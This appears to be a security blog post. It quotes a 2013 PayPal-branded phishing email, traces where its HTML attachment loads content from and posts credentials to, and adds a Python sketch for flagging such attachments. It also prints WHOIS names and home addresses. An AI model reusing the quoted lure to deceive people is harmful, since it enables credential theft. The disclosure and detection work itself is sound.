From: paypal.co.uk [firstname.lastname@example.org]
Date: 18 July 2013 11:01
Subject: We cannot process your payment at this time.
We need your help resolving an issue with your account. To give us time to work together on this, we've temporarily limited what you can do with your account until the issue is resolved.
we understand it may be frustrating not to have full access to your PayPal account. We want to work with you to get your account back to normal as quickly as possible.
What's the problem ?
It's been a little while since you used your account. For reasons relating to the safe use of the PayPal service we need some more information about your account.
Reference Number: PP-001-278-254-803
It's usually quite straight forward to take care of these things. Most of the time, we just need some more information about your account or latest transactions.
Download the attached document and open it in a browser window secure.
Confirm that you are the account holder and follow the instructions.
Copyright 2013 PayPal. All rights reserved PayPal Email ID PP1589
The attached form Account Information-Paypal.html is basically a phishing page, pulling content from www.thesenddirect.com (188.8.131.52 - Aruba, Italy) and submitting the data to www.paypserv.com (184.108.40.206 - also Aruba). The WHOIS details are no doubt fake and are respectively:
Saunders, John Alan email@example.com
4 The Laurels off Oatland Close Botley, 4
Southampton, GB SO322EN

Clarke, Victoria firstname.lastname@example.org
Innex Cottage Ropers Lane, 754
Wrington, GB BS405NH
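
An HTML attachment like the one described above can be triaged without opening it in a browser by listing the hosts it loads content from and the hosts its forms submit to. The Python sketch below is an added example, not part of the original post; the sample markup and its PLACEHOLDER paths are constructed, and only the two hostnames are taken from the analysis above.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Attributes that make a browser fetch remote content when the file is opened.
FETCH_ATTRS = {"src", "href", "background"}


class AttachmentScanner(HTMLParser):
    """Collect hosts an HTML attachment loads content from and posts forms to."""

    def __init__(self):
        super().__init__()
        self.content_hosts = set()
        self.submit_hosts = set()

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            host = (urlsplit((value or "").strip()).hostname or "").lower()
            if not host:
                continue  # relative URL, empty value or non-URL attribute
            if (tag == "form" and name == "action") or name == "formaction":
                self.submit_hosts.add(host)
            elif tag != "a" and name in FETCH_ATTRS:
                self.content_hosts.add(host)


def scan_attachment(html, claimed_brand_domain):
    """Return (content_hosts, submit_hosts, verdict) for an HTML attachment."""
    scanner = AttachmentScanner()
    scanner.feed(html)
    scanner.close()
    # A form that posts anywhere other than the brand named in the mail is the red flag.
    off_brand = {h for h in scanner.submit_hosts
                 if h != claimed_brand_domain
                 and not h.endswith("." + claimed_brand_domain)}
    verdict = "suspicious" if off_brand else "no off-brand form target"
    return scanner.content_hosts, scanner.submit_hosts, verdict


# Constructed sample: layout follows the post's description, paths are invented.
SAMPLE = """<html><head>
<link rel="stylesheet" href="http://www.thesenddirect.com/PLACEHOLDER/style.css">
</head><body><img src="http://www.thesenddirect.com/PLACEHOLDER/logo.gif">
<form method="post" action="http://www.paypserv.com/PLACEHOLDER/submit">
<input name="email"><input type="password" name="pass"></form>
</body></html>"""

if __name__ == "__main__":
    print(scan_attachment(SAMPLE, "paypal.co.uk"))
```

A mail gateway or analyst script can run the same check over every `.html` attachment and quarantine messages whose forms post to a host unrelated to the claimed sender.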
Primrose.co.uk were informed of the breach on 4th July and told me that IT were investigating, but as I haven't heard anything back and customers haven't been notified then I will assume they did not find anything.
Of note is that the spam email does not address customers by name, so it is possibly only email addresses that have been leaked. Also, passwords do not appear to be kept in plaintext, which is good. Without further information from primrose.co.uk it is impossible to say if any financial data has been compromised.